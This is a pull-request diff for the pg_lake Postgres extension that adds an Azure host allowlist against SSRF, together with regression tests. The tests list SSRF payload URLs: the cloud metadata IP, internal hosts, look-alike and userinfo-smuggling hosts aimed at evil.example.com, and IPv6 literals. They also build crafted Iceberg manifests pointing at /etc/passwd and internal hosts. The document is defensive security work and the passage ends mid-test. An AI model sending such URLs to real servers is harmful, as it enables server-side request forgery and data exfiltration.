### PR TITLE
pg_lake_engine: restrict the host in user-supplied Azure URLs

### DIFF
--- a/pg_lake_copy/tests/pytests/test_security.py
+++ b/pg_lake_copy/tests/pytests/test_security.py
@@ -407,3 +407,241 @@ def test_create_table_load_from_with_query_string_is_rejected(pg_conn, s3, exten
         "query parameters" in str(error).lower()
         or "not permitted" in str(error).lower()
     ), f"Expected ?-query rejection, got: {error}"
+
+
+AZURE_SSRF_URLS = [
+    # abfss://<container>@<account>.<endpoint>/<path>: the endpoint half of the
+    # host is whatever the user writes, so the request goes wherever they point
+    # it.  No query string is involved, so the s3_endpoint= allowlist never ran.
+    "abfss://c@169.254.169.254/data.csv",
+    "abfss://c@account.internal.example.com/data.csv",
+    # a host that only looks like it is under the allowed suffix
+    "abfss://c@account.dfs.core.windows.net.evil.example.com/data.csv",
+    "abfss://c@evilblob.core.windows.net/data.csv",
+    # userinfo smuggling: the Azure SDK reads everything before the last '@' as
+    # userinfo, so this connects to evil.example.com
+    "abfss://c@account.dfs.core.windows.net@evil.example.com/data.csv",
+    # (azure|az)://<account>.<endpoint>/<container>/<path> is the same vector
+    # without an '@' at all
+    "az://account.internal.example.com/c/data.csv",
+    "azure://account.internal.example.com/c/data.csv",
+    # a dot in the container name makes DuckDB's parser split the host
+    # somewhere else, reaching a single-label internal host
+    "abfss://c.d@internal-service/data.csv",
+]
+
+
+@pytest.mark.parametrize("url", AZURE_SSRF_URLS)
+def test_azure_url_with_unallowed_host_is_rejected(pg_conn, extension, url):
+    """
+    Regression test for the Azure half of the endpoint-override SSRF: Azure
+    schemes carry the storage endpoint in the URL host, not the query string,
+    so CheckUserSuppliedURL()'s query-parameter allowlist returned early and
+    the URL reached DuckDB's azure filesystem, which issues the request to
+    https://<account>.<endpoint> as the URL spells it.
+
+    Fix: CheckAzureURLHost() requires the host to sit under
+    pg_lake.allowed_azure_host_suffixes.
+    """
+    run_command("CREATE TEMP TABLE IF NOT EXISTS sec_ssrf_azure (doc jsonb)", pg_conn)
+    pg_conn.commit()
+
+    error = run_command(
+        f"COPY sec_ssrf_azure FROM '{url}' WITH (format 'json')",
+        pg_conn,
+        raise_error=False,
+    )
+    pg_conn.rollback()
+
+    assert error is not None, (
+        f"SECURITY REGRESSION: COPY FROM '{url}' was accepted. "
+        "CheckAzureURLHost() must reject Azure URLs naming a host outside "
+        "pg_lake.allowed_azure_host_suffixes."
+    )
+    assert (
+        "not permitted" in str(error).lower() or "malformed" in str(error).lower()
+    ), f"Expected an Azure host rejection, got: {error}"
+
+
+@pytest.mark.parametrize("url", AZURE_SSRF_URLS)
+def test_azure_url_with_unallowed_host_is_rejected_on_write(pg_conn, extension, url):
+    """
+    Same vector on the write path, which exfiltrates the query result to the
+    chosen host instead of reading its response back.
+    """
+    error = run_command(
+        f"COPY (SELECT 1 AS id) TO '{url}' WITH (format 'csv')",
+        pg_conn,
+        raise_error=False,
+    )
+    pg_conn.rollback()
+
+    assert (
+        error is not None
+    ), f"SECURITY REGRESSION: COPY TO '{url}' was accepted on the write path."
+    assert (
+        "not permitted" in str(error).lower() or "malformed" in str(error).lower()
+    ), f"Expected an Azure host rejection on write, got: {error}"
+
+
+def test_azure_url_with_unallowed_host_is_rejected_for_foreign_table(
+    pg_conn, extension
+):
+    """
+    The path option of a foreign table is the other user-supplied URL entry
+    point, and every SELECT on the table forwards it to pgduck_server.
+    """
+    url = "abfss://c@account.internal.example.com/data.parquet"
+
+    error = run_command(
+        f"""
+        CREATE FOREIGN TABLE sec_ssrf_azure_ft (id int)
+        SERVER pg_lake OPTIONS (path '{url}', format 'parquet')
+        """,
+        pg_conn,
+        raise_error=False,
+    )
+    pg_conn.rollback()
+
+    assert (
+        error is not None
+    ), "SECURITY REGRESSION: CREATE FOREIGN TABLE with an Azure SSRF path was accepted."
+    assert (
+        "not permitted" in str(error).lower()
+    ), f"Expected an Azure host rejection, got: {error}"
+
+
+def test_azure_url_with_allowed_host_passes_the_url_check(pg_conn, extension):
+    """
+    A fully qualified URL under an allowed suffix must get past the URL check.
+    There is no such account here, so the read still fails, but it must fail in
+    the storage client rather than in CheckAzureURLHost().
+    """
+    for url in (
+        "abfss://c@someaccount.dfs.core.windows.net/data.csv",
+        "az://someaccount.blob.core.windows.net/c/data.csv",
+    ):
+        error = run_command(
+            f"COPY (SELECT 1 AS id) TO '{url}' WITH (format 'csv')",
+            pg_conn,
+            raise_error=False,
+        )
+        pg_conn.rollback()
+
+        assert "not permitted" not in str(error).lower(), (
+            f"'{url}' is under an allowed host suffix and must not be rejected "
+            f"by the URL check, got: {error}"
+        )
+
+
+def test_azure_container_url_still_works(pg_conn, azure, extension):
+    """
+    az://<container>/<path> names no host at all: DuckDB takes both the account
+    and the endpoint from the Azure secret, which only an admin can create.  It
+    is the form every Azure test uses and must keep working.
+    """
+    url = f"az://{TEST_BUCKET}/sec_azure_clean/data.csv"
+
+    run_command(
+        f"COPY (SELECT 1 AS id, 'hi' AS val) TO '{url}' WITH (format 'csv')",
+        pg_conn,
+    )
+    pg_conn.commit()
+
+    run_command("CREATE TEMP TABLE sec_azure_clean (id int, val text)", pg_conn)
+    pg_conn.commit()
+
+    run_command(f"COPY sec_azure_clean FROM '{url}' WITH (format 'csv')", pg_conn)
+    pg_conn.rollback()
+
+
+def test_azure_host_suffix_setting_is_not_user_settable(noaccess_conn):
+    """
+    The allowlist is the escape hatch for a private or sovereign endpoint, so a
+    role that can supply URLs must not be able to widen it.  PGC_SUSET keeps it
+    to superusers.
+    """
+    noaccess_conn.rollback()
+
+    error = run_command(
+        "SET pg_lake.allowed_azure_host_suffixes TO '.internal.example.com'",
+        noaccess_conn,
+        raise_error=False,
+    )
+    noaccess_conn.rollback()
+
+    assert error is not None, (
+        "SECURITY REGRESSION: a non-superuser changed "
+        "pg_lake.allowed_azure_host_suffixes, which defeats the host check."
+    )
+    assert (
+        "permission denied" in str(error).lower()
+    ), f"Expected a permission error, got: {error}"
+
+
+def test_azure_host_suffix_setting_widens_the_allowlist(extension):
+    """
+    An admin running against a private endpoint has to be able to allow it, so
+    the same URL must go from rejected to accepted by the URL check once the
+    suffix is on the list.
+    """
+    url = "abfss://c@account.internal.example.com/data.csv"
+    admin = open_pg_conn()
+
+    try:
+        error = run_command(
+            f"COPY (SELECT 1 AS id) TO '{url}' WITH (format 'csv')",
+            admin,
+            raise_error=False,
+        )
+        admin.rollback()
+        assert (
+            "not permitted" in str(error).lower()
+        ), f"Expected a rejection, got: {error}"
+
+        run_command(
+            "SET pg_lake.allowed_azure_host_suffixes TO '.internal.example.com'", admin
+        )
+        error = run_command(
+            f"COPY (SELECT 1 AS id) TO '{url}' WITH (format 'csv')",
+            admin,
+            raise_error=False,
+        )
+        admin.rollback()
+
+        assert (
+            "not permitted" not in str(error).lower()
+        ), f"Expected the URL check to accept the allowed host, got: {error}"
+    finally:
+        admin.close()
+
+
+def test_azure_host_suffix_setting_rejects_a_malformed_list(extension):
+    """
+    The suffix list is read on every user-supplied Azure URL, so a list that
+    does not parse has to fail at SET time.  Without a check hook the SET
+    succeeds and every Azure URL then fails somewhere unrelated instead.
+    """
+    admin = open_pg_conn()
+    setting = "pg_lake.allowed_azure_host_suffixes"
+
+    try:
+        error = run_command(
+            f"SET {setting} TO '\".blob.core.windows.net'",
+            admin,
+            raise_error=False,
+        )
+        admin.rollback()
+
+        assert error is not None, "Expected the malformed suffix list to be rejected"
+        assert (
+            "comma-separated list" in str(error).lower()
+        ), f"Expected the list-parse detail, got: {error}"
+
+        current = run_query(f"SHOW {setting}", admin)
+        remaining = current[0][setting]
+        assert (
+            ".blob.core.windows.net" in remaining
+        ), f"A rejected SET must leave the previous list in place, got: {remaining}"
+    finally:
+        admin.close()

--- a/pg_lake_copy/tests/pytests/test_security.py
+++ b/pg_lake_copy/tests/pytests/test_security.py
@@ -428,6 +428,10 @@ AZURE_SSRF_URLS = [
     # a dot in the container name makes DuckDB's parser split the host
     # somewhere else, reaching a single-label internal host
     "abfss://c.d@internal-service/data.csv",
+    # a bracketed IPv6 literal is an explicit endpoint with no dot, so it must
+    # not slip past the host check the way a dotless secret-derived host does
+    "abfss://c@[::1]/data.csv",
+    "az://[fd00::1]/c/data.csv",
 ]
 
 

--- a/pg_lake_engine/include/pg_lake/extensions/pg_lake_engine.h
+++ b/pg_lake_engine/include/pg_lake/extensions/pg_lake_engine.h
@@ -25,9 +25,20 @@
 #define PG_LAKE_READ_TABLE "__lake_read_table"
 #define IN_PROGRESS_FILES_TABLE "in_progress_files"
 
+/*
+ * Storage endpoints a user-supplied Azure URL may name in its host, as host
+ * suffixes.  Covers the public, US Government and China clouds, for both the
+ * Data Lake Storage (dfs) and blob endpoints.
+ */
+#define DEFAULT_ALLOWED_AZURE_HOST_SUFFIXES \
+	".dfs.core.windows.net,.blob.core.windows.net," \
+	".dfs.core.usgovcloudapi.net,.blob.core.usgovcloudapi.net," \
+	".dfs.core.chinacloudapi.cn,.blob.core.chinacloudapi.cn"
+
 
 extern PGDLLEXPORT bool EnableHeavyAsserts;
 extern PGDLLEXPORT char *PgLakeStageLocation;
+extern PGDLLEXPORT char *PgLakeAllowedAzureHostSuffixes;
 
 /* cached extension IDs for pg_lake_engine */
 extern PGDLLEXPORT CachedExtensionIds * PgLakeEngine;

--- a/pg_lake_engine/include/pg_lake/permissions/roles.h
+++ b/pg_lake_engine/include/pg_lake/permissions/roles.h
@@ -23,6 +23,7 @@ extern PGDLLEXPORT Oid PgLakeReadRoleId(void);
 extern PGDLLEXPORT Oid PgLakeWriteRoleId(void);
 extern PGDLLEXPORT void CheckURLReadAccess(const char *url);
 extern PGDLLEXPORT void CheckURLWriteAccess(const char *url);
+extern PGDLLEXPORT void ValidateStorageURL(const char *url);
 
 
 #endif

--- a/pg_lake_engine/src/init.c
+++ b/pg_lake_engine/src/init.c
@@ -47,12 +47,15 @@
 #include "pg_lake/pgduck/iceberg_validation.h"
 #include "pg_lake/util/s3_writer_utils.h"
 #include "utils/guc.h"
+#include "utils/varlena.h"
 
 PG_MODULE_MAGIC;
 
 /* function declarations */
 void		_PG_init(void);
 static bool PgLakeStageLocationCheckHook(char **newvalue, void **extra, GucSource source);
+static bool PgLakeAllowedAzureHostSuffixesCheckHook(char **newvalue, void **extra,
+													GucSource source);
 
 /* pg_lake_engine.enabled setting */
 static bool QueryEngineEnabled = true;
@@ -62,6 +65,9 @@ bool		EnableHeavyAsserts = false;
 
 /* pg_lake.stage_location setting */
 char	   *PgLakeStageLocation = NULL;
+
+/* pg_lake.allowed_azure_host_suffixes setting */
+char	   *PgLakeAllowedAzureHostSuffixes = NULL;
 
 
 /*
@@ -218,6 +224,21 @@ _PG_init(void)
 							   PgLakeStageLocationCheckHook,
 							   NULL, NULL);
 
+	DefineCustomStringVariable(
+							   "pg_lake.allowed_azure_host_suffixes",
+							   gettext_noop("Comma-separated list of host suffixes a user-supplied "
+											"Azure URL may name a storage endpoint under"),
+							   gettext_noop("Azure URLs carry the storage endpoint in the host, so "
+											"an unrestricted host is an SSRF vector.  An empty list "
+											"rejects every URL that names a host; the endpoint from "
+											"the Azure secret is always allowed."),
+							   &PgLakeAllowedAzureHostSuffixes,
+							   DEFAULT_ALLOWED_AZURE_HOST_SUFFIXES,
+							   PGC_SUSET,
+							   GUC_LIST_INPUT,
+							   PgLakeAllowedAzureHostSuffixesCheckHook,
+							   NULL, NULL);
+
 	if (QueryEngineEnabled)
 	{
 		InitializePgLakeEngineIdCache();
@@ -276,4 +297,31 @@ PgLakeStageLocationCheckHook(char **newvalue, void **extra, GucSource source)
 	}
 
 	return true;
+}
+
+
+/*
+ * PgLakeAllowedAzureHostSuffixesCheckHook validates the
+ * pg_lake.allowed_azure_host_suffixes GUC value.  The suffix list is read on
+ * every user-supplied Azure URL, so reject a list that does not parse here
+ * rather than at the first URL that needs it.
+ */
+static bool
+PgLakeAllowedAzureHostSuffixesCheckHook(char **newvalue, void **extra, GucSource source)
+{
+	if (*newvalue == NULL)
+		return true;
+
+	char	   *suffixList = pstrdup(*newvalue);
+	List	   *suffixes = NIL;
+	bool		parsed = SplitIdentifierString(suffixList, ',', &suffixes);
+
+	if (!parsed)
+		GUC_check_errdetail("pg_lake.allowed_azure_host_suffixes must be a "
+							"comma-separated list of host suffixes");
+
+	list_free(suffixes);
+	pfree(suffixList);
+
+	return parsed;
 }

--- a/pg_lake_engine/src/permissions/roles.c
+++ b/pg_lake_engine/src/permissions/roles.c
@@ -24,8 +24,10 @@
 #include <string.h>
 
 #include "pg_lake/copy/copy_format.h"
+#include "pg_lake/extensions/pg_lake_engine.h"
 #include "pg_lake/permissions/roles.h"
 #include "utils/acl.h"
+#include "utils/varlena.h"
 
 #define lake_read_ROLE_NAME "lake_read"
 #define lake_write_ROLE_NAME "lake_write"
@@ -33,6 +35,10 @@
 
 static void CheckUserSuppliedURL(const char *url);
 static bool IsAllowedQueryParamKey(const char *param, size_t paramLen);
+static void CheckAzureURLHost(const char *url);
+static const char *AzureURLPrefix(const char *url);
+static bool IsAllowedAzureHost(const char *host, size_t hostLen);
+static const char *AllowedAzureHostSuffixes(void);
 
 
 /*
@@ -171,10 +177,8 @@ CheckURLWriteAccess(const char *url)
  * http(s):// URLs are exempt entirely: '?' is a normal query-string
  * separator there and the s3_endpoint trick does not apply.
  *
- * NOTE: this does not cover Azure (abfss://, az://).  Those schemes encode
- * the storage endpoint in the URL host (<account>.<endpoint>), not the
- * query string, so abfss://c@account.<internal-host>/... bypasses this
- * check.  A separate host check is needed to close that.
+ * The Azure schemes carry the endpoint in the URL host rather than the query
+ * string, so they get their own check, see CheckAzureURLHost().
  */
 static void
 CheckUserSuppliedURL(const char *url)
@@ -185,6 +189,8 @@ CheckUserSuppliedURL(const char *url)
 	if (strncmp(url, HTTP_URL_PREFIX, strlen(HTTP_URL_PREFIX)) == 0 ||
 		strncmp(url, HTTPS_URL_PREFIX, strlen(HTTPS_URL_PREFIX)) == 0)
 		return;
+
+	CheckAzureURLHost(url);
 
 	const char *queryStart = strchr(url, '?');
 
@@ -247,4 +253,154 @@ IsAllowedQueryParamKey(const char *param, size_t paramLen)
 	}
 
 	return false;
+}
+
+
+/*
+ * CheckAzureURLHost is the Azure counterpart of the query-parameter check.
+ * DuckDB's azure filesystem derives the request target from the URL host:
+ * az://<account>.<endpoint>/<container>/<path> and
+ * abfss://<container>@<account>.<endpoint>/<path> both send the request to
+ * https://<account>.<endpoint>, so a lake_read user can point the server at
+ * any host and read the response back as query rows.  Require the host to
+ * end in one of the suffixes in pg_lake.allowed_azure_host_suffixes.
+ *
+ * A host with no dot in it is not an endpoint: DuckDB then takes both the
+ * account and the endpoint from the configured secret, which only an admin
+ * can create, so az://<container>/<path> stays allowed.
+ */
+static void
+CheckAzureURLHost(const char *url)
+{
+	const char *prefix = AzureURLPrefix(url);
+
+	if (prefix == NULL)
+		return;
+
+	const char *authority = url + strlen(prefix);
+	const char *pathStart = strchr(authority, '/');
+	size_t		authorityLen = pathStart != NULL ? (size_t) (pathStart - authority)
+		: strlen(authority);
+	const char *host = authority;
+	size_t		hostLen = authorityLen;
+	const char *atSign = memchr(authority, '@', authorityLen);
+
+	if (atSign != NULL)
+	{
+		size_t		containerLen = (size_t) (atSign - authority);
+
+		host = atSign + 1;
+		hostLen = authorityLen - containerLen - 1;
+
+		/*
+		 * Azure container names cannot contain a dot or an '@', and DuckDB's
+		 * URL parser splits the host elsewhere when they do, which is a way
+		 * to reach a host this check would otherwise reject.
+		 */
+		if (memchr(authority, '.', containerLen) != NULL ||
+			memchr(host, '@', hostLen) != NULL)
+			ereport(ERROR,
+					(errcode(ERRCODE_INVALID_PARAMETER_VALUE),
+					 errmsg("pg_lake: malformed Azure URL: \"%s\"", url),
+					 errhint("Use %s<container>@<account>.<endpoint>/<path> with a container name that contains no '.' or '@'.",
+							 prefix)));
+	}
+
+	if (memchr(host, '.', hostLen) == NULL)
+		return;
+
+	if (!IsAllowedAzureHost(host, hostLen))
+		ereport(ERROR,
+				(errcode(ERRCODE_INVALID_PARAMETER_VALUE),
+				 errmsg("pg_lake: Azure storage host \"%.*s\" is not permitted",
+						(int) hostLen, host),
+				 errdetail("URL contains a host outside pg_lake.allowed_azure_host_suffixes: \"%s\".", url),
+				 errhint("Use a host under one of: %s, or omit the host to use the endpoint from the Azure secret.",
+						 AllowedAzureHostSuffixes())));
+}
+
+
+/*
+ * AzureURLPrefix returns the Azure scheme prefix url starts with, or NULL if
+ * url is not an Azure URL.  Only the schemes IsSupportedURL() accepts are
+ * listed; abfs:// (plaintext) is rejected before this runs.
+ */
+static const char *
+AzureURLPrefix(const char *url)
+{
+	static const char *const azurePrefixes[] = {
+		AZURE_URL_PREFIX,
+		AZURE_BLOB_URL_PREFIX,
+		AZURE_DLS_URL_PREFIX,
+		NULL,
+	};
+
+	for (const char *const *prefix = azurePrefixes; *prefix; prefix++)
+	{
+		if (strncmp(url, *prefix, strlen(*prefix)) == 0)
+			return *prefix;
+	}
+
+	return NULL;
+}
+
+
+/*
+ * IsAllowedAzureHost returns whether host ends in one of the suffixes in
+ * pg_lake.allowed_azure_host_suffixes.  The match has to fall on a label
+ * boundary and leave at least one character of storage account name, so
+ * neither "evilblob.core.windows.net" nor "blob.core.windows.net" itself
+ * passes for the suffix ".blob.core.windows.net".
+ */
+static bool
+IsAllowedAzureHost(const char *host, size_t hostLen)
+{
+	char	   *suffixList = pstrdup(AllowedAzureHostSuffixes());
+	List	   *suffixes = NIL;
+	ListCell   *suffixCell = NULL;
+	bool		allowed = false;
+
+	if (!SplitIdentifierString(suffixList, ',', &suffixes))
+		ereport(ERROR,
+				(errcode(ERRCODE_INVALID_PARAMETER_VALUE),
+				 errmsg("pg_lake.allowed_azure_host_suffixes does not parse as a "
+						"comma-separated list of host suffixes")));
+
+	foreach(suffixCell, suffixes)
+	{
+		const char *suffix = (const char *) lfirst(suffixCell);
+		size_t		suffixLen = strlen(suffix);
+
+		if (suffixLen == 0 || hostLen <= suffixLen)
+			continue;
+
+		if (pg_strncasecmp(host + hostLen - suffixLen, suffix, suffixLen) != 0)
+			continue;
+
+		/* a suffix given without a leading dot still only matches a label */
+		if (suffix[0] != '.' && host[hostLen - suffixLen - 1] != '.')
+			continue;
+
+		allowed = true;
+		break;
+	}
+
+	list_free(suffixes);
+	pfree(suffixList);
+
+	return allowed;
+}
+
+
+/*
+ * AllowedAzureHostSuffixes returns the configured suffix list, treating an
+ * empty setting as "no Azure host may be named in a URL".
+ */
+static const char *
+AllowedAzureHostSuffixes(void)
+{
+	if (PgLakeAllowedAzureHostSuffixes == NULL)
+		return "";
+
+	return PgLakeAllowedAzureHostSuffixes;
 }

--- a/pg_lake_engine/src/permissions/roles.c
+++ b/pg_lake_engine/src/permissions/roles.c
@@ -319,7 +319,13 @@ CheckAzureURLHost(const char *url)
 							 prefix)));
 	}
 
-	if (memchr(host, '.', hostLen) == NULL)
+	/*
+	 * A host with no dot is not an endpoint: DuckDB takes both the account
+	 * and the endpoint from the secret, so az://<container>/<path> stays
+	 * allowed. A bracketed IPv6 literal ([::1], [fd00::1]) carries no dot
+	 * either but is an explicit endpoint, so it must not take this exit.
+	 */
+	if (memchr(host, '.', hostLen) == NULL && (hostLen == 0 || host[0] != '['))
 		return;
 
 	if (!IsAllowedAzureHost(host, hostLen))

--- a/pg_lake_engine/src/permissions/roles.c
+++ b/pg_lake_engine/src/permissions/roles.c
@@ -99,11 +99,7 @@ CheckURLReadAccess(const char *url)
 	if (url == NULL)
 		return;
 
-	if (!IsSupportedURL(url))
-		ereport(ERROR, (errcode(ERRCODE_FEATURE_NOT_SUPPORTED),
-						errmsg("pg_lake: unsupported URL: \"%s\"", url)));
-
-	CheckUserSuppliedURL(url);
+	ValidateStorageURL(url);
 }
 
 
@@ -154,6 +150,23 @@ CheckURLWriteAccess(const char *url)
 				(errcode(ERRCODE_FEATURE_NOT_SUPPORTED),
 				 errmsg("pg_lake: writes to http:// or https:// URLs are not permitted"),
 				 errhint("Use a cloud storage URL (s3://, gs://, az://, ...) instead.")));
+
+	CheckUserSuppliedURL(url);
+}
+
+
+/*
+ * ValidateStorageURL applies the scheme and URL restrictions without the
+ * lake_read role check, for a URL pg_lake read out of table data (an Iceberg
+ * manifest or data-file path) where the role check already ran on the URL the
+ * user named.
+ */
+void
+ValidateStorageURL(const char *url)
+{
+	if (!IsSupportedURL(url))
+		ereport(ERROR, (errcode(ERRCODE_FEATURE_NOT_SUPPORTED),
+						errmsg("pg_lake: unsupported URL: \"%s\"", url)));
 
 	CheckUserSuppliedURL(url);
 }

--- a/pg_lake_iceberg/src/iceberg/read_manifest.c
+++ b/pg_lake_iceberg/src/iceberg/read_manifest.c
@@ -85,7 +85,7 @@ static IcebergScalarAvroType IcebergAvroTypeFromString(const char *physicalTypeN
 List *
 ReadIcebergManifests(const char *manifestListPath)
 {
-	CheckURLReadAccess(manifestListPath);
+	ValidateStorageURL(manifestListPath);
 
 	size_t		contentLength = 0;
 	char	   *manifestListBlob = GetBlobFromURI(manifestListPath, &contentLength);
@@ -135,7 +135,7 @@ ReadIcebergManifests(const char *manifestListPath)
 List *
 ReadManifestEntries(const char *manifestPath)
 {
-	CheckURLReadAccess(manifestPath);
+	ValidateStorageURL(manifestPath);
 
 	size_t		contentLength = 0;
 	char	   *manifestBlob = GetBlobFromURI(manifestPath, &contentLength);
@@ -258,7 +258,7 @@ ReadDataFileFromAvro(avro_value_t * record, DataFile * dataFile, ManifestReaderC
 	AvroGetInt32Field(record, "content", AVRO_FIELD_REQUIRED, (int32_t *) &dataFile->content);
 	AvroGetStringField(record, "file_path", AVRO_FIELD_REQUIRED, &dataFile->file_path, &dataFile->file_path_length);
 
-	CheckURLReadAccess(dataFile->file_path);
+	ValidateStorageURL(dataFile->file_path);
 
 	AvroGetStringField(record, "file_format", AVRO_FIELD_REQUIRED, &dataFile->file_format, &dataFile->file_format_length);
 

--- a/pg_lake_iceberg/src/iceberg/read_manifest.c
+++ b/pg_lake_iceberg/src/iceberg/read_manifest.c
@@ -28,6 +28,7 @@
 #include "pg_lake/iceberg/manifest_spec.h"
 #include "pg_lake/avro/avro_reader.h"
 #include "pg_lake/copy/copy_format.h"
+#include "pg_lake/permissions/roles.h"
 #include "pg_lake/util/s3_reader_utils.h"
 #include "pg_lake/util/s3_writer_utils.h"
 #include "pg_lake/util/plan_cache.h"
@@ -84,6 +85,8 @@ static IcebergScalarAvroType IcebergAvroTypeFromString(const char *physicalTypeN
 List *
 ReadIcebergManifests(const char *manifestListPath)
 {
+	CheckURLReadAccess(manifestListPath);
+
 	size_t		contentLength = 0;
 	char	   *manifestListBlob = GetBlobFromURI(manifestListPath, &contentLength);
 
@@ -132,6 +135,8 @@ ReadIcebergManifests(const char *manifestListPath)
 List *
 ReadManifestEntries(const char *manifestPath)
 {
+	CheckURLReadAccess(manifestPath);
+
 	size_t		contentLength = 0;
 	char	   *manifestBlob = GetBlobFromURI(manifestPath, &contentLength);
 
@@ -253,19 +258,7 @@ ReadDataFileFromAvro(avro_value_t * record, DataFile * dataFile, ManifestReaderC
 	AvroGetInt32Field(record, "content", AVRO_FIELD_REQUIRED, (int32_t *) &dataFile->content);
 	AvroGetStringField(record, "file_path", AVRO_FIELD_REQUIRED, &dataFile->file_path, &dataFile->file_path_length);
 
-	/*
-	 * Validate file_path against the supported-scheme allowlist.  The value
-	 * comes from attacker-controlled Avro data; without this check a manifest
-	 * with file_path="/etc/passwd" would be forwarded to DuckDB's
-	 * LocalFileSystem, bypassing the pg_read_server_files boundary.
-	 */
-	if (!IsSupportedURL(dataFile->file_path))
-		ereport(ERROR,
-				(errcode(ERRCODE_INVALID_PARAMETER_VALUE),
-				 errmsg("pg_lake_iceberg: unsupported data-file URL: \"%s\"",
-						dataFile->file_path),
-				 errhint("Iceberg data-file paths must use a supported cloud "
-						 "storage scheme (s3://, azure://, etc.).")));
+	CheckURLReadAccess(dataFile->file_path);
 
 	AvroGetStringField(record, "file_format", AVRO_FIELD_REQUIRED, &dataFile->file_format, &dataFile->file_format_length);
 

--- a/pg_lake_iceberg/tests/pytests/test_security.py
+++ b/pg_lake_iceberg/tests/pytests/test_security.py
@@ -2,10 +2,76 @@
 Security regression tests for pg_lake_iceberg Avro parsing vulnerabilities.
 """
 
+import io
 import json
 import tempfile
+
+import fastavro
 import pytest
 from utils_pytest import *
+
+
+AZURE_NESTED_SSRF_URL = "abfss://c@account.internal.example.com/file.avro"
+
+
+def upload_rewritten_avro(s3, source_path, key, rewrite_record):
+    with open(source_path, "rb") as source_file:
+        reader = fastavro.reader(source_file)
+        writer_schema = reader.writer_schema
+        metadata = {
+            name: value
+            for name, value in reader.metadata.items()
+            if not name.startswith("avro.")
+        }
+        records = list(reader)
+
+    rewrite_record(records[0])
+
+    output = io.BytesIO()
+    fastavro.writer(output, writer_schema, records, metadata=metadata)
+    s3.put_object(Bucket=TEST_BUCKET, Key=key, Body=output.getvalue())
+
+    return f"s3://{TEST_BUCKET}/{key}"
+
+
+def upload_metadata_with_manifest_list(s3, key, manifest_list_url):
+    metadata = {
+        "format-version": 2,
+        "table-uuid": "00000000-0000-0000-0000-000000000000",
+        "location": f"s3://{TEST_BUCKET}/sec_nested_test",
+        "last-sequence-number": 1,
+        "last-updated-ms": 0,
+        "last-column-id": 1,
+        "schemas": [{"type": "struct", "fields": [], "schema-id": 0}],
+        "current-schema-id": 0,
+        "partition-specs": [{"spec-id": 0, "fields": []}],
+        "default-spec-id": 0,
+        "last-partition-id": 999,
+        "sort-orders": [{"order-id": 0, "fields": []}],
+        "default-sort-order-id": 0,
+        "snapshots": [
+            {
+                "snapshot-id": 1,
+                "sequence-number": 1,
+                "timestamp-ms": 0,
+                "manifest-list": manifest_list_url,
+                "summary": {"operation": "append"},
+                "schema-id": 0,
+            }
+        ],
+        "current-snapshot-id": 1,
+        "refs": {"main": {"snapshot-id": 1, "type": "branch"}},
+        "snapshot-log": [],
+        "metadata-log": [],
+    }
+
+    s3.put_object(
+        Bucket=TEST_BUCKET,
+        Key=key,
+        Body=json.dumps(metadata).encode("utf-8"),
+    )
+
+    return f"s3://{TEST_BUCKET}/{key}"
 
 
 def test_avro_int32_array_with_equality_ids_parses_correctly(
@@ -220,46 +286,8 @@ def test_iceberg_files_nested_manifest_list_local_path_is_rejected(
     the error is 'unsupported manifest-list URL'; on vulnerable code DuckDB
     tries to open the local path.
     """
-    import json
-
-    # Craft a minimal Iceberg v2 metadata.json with a local manifest-list path.
-    crafted_metadata = {
-        "format-version": 2,
-        "table-uuid": "00000000-0000-0000-0000-000000000000",
-        "location": f"s3://{TEST_BUCKET}/sec_nested_test",
-        "last-sequence-number": 1,
-        "last-updated-ms": 0,
-        "last-column-id": 1,
-        "schemas": [{"type": "struct", "fields": [], "schema-id": 0}],
-        "current-schema-id": 0,
-        "partition-specs": [{"spec-id": 0, "fields": []}],
-        "default-spec-id": 0,
-        "last-partition-id": 999,
-        "sort-orders": [{"order-id": 0, "fields": []}],
-        "default-sort-order-id": 0,
-        "snapshots": [
-            {
-                "snapshot-id": 1,
-                "sequence-number": 1,
-                "timestamp-ms": 0,
-                "manifest-list": "/etc/passwd",  # ← attacker-controlled local path
-                "summary": {"operation": "append"},
-                "schema-id": 0,
-            }
-        ],
-        "current-snapshot-id": 1,
-        "refs": {"main": {"snapshot-id": 1, "type": "branch"}},
-        "snapshot-log": [],
-        "metadata-log": [],
-    }
-
     key = "sec_test/crafted_nested_metadata.json"
-    s3.put_object(
-        Bucket=TEST_BUCKET,
-        Key=key,
-        Body=json.dumps(crafted_metadata).encode("utf-8"),
-    )
-    metadata_url = f"s3://{TEST_BUCKET}/{key}"
+    metadata_url = upload_metadata_with_manifest_list(s3, key, "/etc/passwd")
 
     error = run_command(
         f"SELECT * FROM lake_iceberg.files('{metadata_url}')",
@@ -284,6 +312,81 @@ def test_iceberg_files_nested_manifest_list_local_path_is_rejected(
         "SECURITY REGRESSION: /etc/passwd content appeared in the error, "
         "meaning DuckDB opened the local file before the URI check ran."
     )
+
+
+def test_nested_azure_manifest_list_host_is_rejected(pg_conn, s3, extension):
+    metadata_url = upload_metadata_with_manifest_list(
+        s3,
+        "sec_test/azure_manifest_list_metadata.json",
+        AZURE_NESTED_SSRF_URL,
+    )
+
+    error = run_command(
+        f"SELECT * FROM lake_iceberg.files('{metadata_url}')",
+        pg_conn,
+        raise_error=False,
+    )
+    pg_conn.rollback()
+
+    assert "not permitted" in str(error).lower(), error
+
+
+def test_nested_azure_manifest_host_is_rejected(pg_conn, s3, extension):
+    manifest_list_url = upload_rewritten_avro(
+        s3,
+        sampledata_filepath(
+            "iceberg/test_types/metadata/"
+            "snap-1852021276567276625-1-38be813e-9b78-4704-a06e-894398332366.avro"
+        ),
+        "sec_test/azure_manifest_path.avro",
+        lambda record: record.update({"manifest_path": AZURE_NESTED_SSRF_URL}),
+    )
+    metadata_url = upload_metadata_with_manifest_list(
+        s3,
+        "sec_test/azure_manifest_metadata.json",
+        manifest_list_url,
+    )
+
+    error = run_command(
+        f"SELECT * FROM lake_iceberg.files('{metadata_url}')",
+        pg_conn,
+        raise_error=False,
+    )
+    pg_conn.rollback()
+
+    assert "not permitted" in str(error).lower(), error
+
+
+def test_nested_azure_data_file_host_is_rejected(pg_conn, s3, extension):
+    manifest_url = upload_rewritten_avro(
+        s3,
+        sample_avro_filepath("equality-ids-manifest.avro"),
+        "sec_test/azure_data_file_manifest.avro",
+        lambda record: record["data_file"].update({"file_path": AZURE_NESTED_SSRF_URL}),
+    )
+    manifest_list_url = upload_rewritten_avro(
+        s3,
+        sampledata_filepath(
+            "iceberg/test_types/metadata/"
+            "snap-1852021276567276625-1-38be813e-9b78-4704-a06e-894398332366.avro"
+        ),
